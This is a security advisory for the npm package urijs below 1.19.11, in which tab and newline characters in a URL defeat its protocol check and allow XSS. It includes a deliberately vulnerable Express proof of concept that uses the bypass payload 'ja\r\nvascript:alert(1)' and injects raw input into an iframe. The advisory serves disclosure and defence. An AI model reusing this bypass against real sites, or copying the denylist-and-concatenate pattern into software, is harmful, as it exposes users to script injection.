
GSA_kwCzR0hTQS0zdmpmLTgyZmYtcDRyM804xw

Severity: High
EPSS: 0.00318% (0.54035 percentile)

Incorrect protocol extraction via \r, \n and \t characters

Affected Packages

  Package:                npm:urijs (PURL: pkg:npm/urijs)
  Affected versions:      < 1.19.11
  Fixed versions:         1.19.11
  Dependent packages:     1,163
  Dependent repositories: 187,610
  Downloads last month:   13,066,941

Affected Version Ranges

All affected versions

1.16.1, 1.17.0, 1.17.1, 1.18.0, 1.18.1, 1.18.2, 1.18.3, 1.18.4, 1.18.5, 1.18.6, 1.18.7, 1.18.8, 1.18.9, 1.18.10, 1.18.11, 1.18.12, 1.19.0, 1.19.1, 1.19.2, 1.19.3, 1.19.4, 1.19.5, 1.19.6, 1.19.7, 1.19.8, 1.19.9, 1.19.10

All unaffected versions

1.19.11

Carriage return (\r), line feed (\n) and tab (\t) characters in user-supplied URLs can lead to incorrect protocol extraction in the npm package urijs prior to version 1.19.11.

This can lead to XSS when the module is used as a filter intended to keep malicious javascript: links out of HTML or JavaScript, as in the following example. Browsers remove ASCII tab and newline characters from a URL before resolving its scheme, so an input that urijs does not classify as javascript: is still executed as a javascript: URL once it reaches the page.

// Deliberately vulnerable example from the advisory: urijs < 1.19.11 is
// used as a denylist filter to keep javascript: links out of an iframe src.
const parse = require('urijs')
const express = require('express')
const app = express()
const port = 3000

// Attacker-controlled URL: the scheme is split by \r\n, which the browser
// strips from the URL before resolving the scheme.
const input = "ja\r\nvascript:alert(1)"
const url = parse(input)

console.log(url)

app.get('/', (req, res) => {
  // urijs exposes the scheme via the protocol() accessor (without the
  // trailing colon). The affected versions do not report "javascript" for
  // this input, so the check passes and the raw string, \r\n included, is
  // embedded in the iframe src, where the browser runs it as javascript:.
  if (url.protocol() !== "javascript") {res.send("<iframe src=\'" + input + "\'>CLICK ME!</iframe>")}
})

app.listen(port, () => {
  console.log(`Example app listening on port ${port}`)
})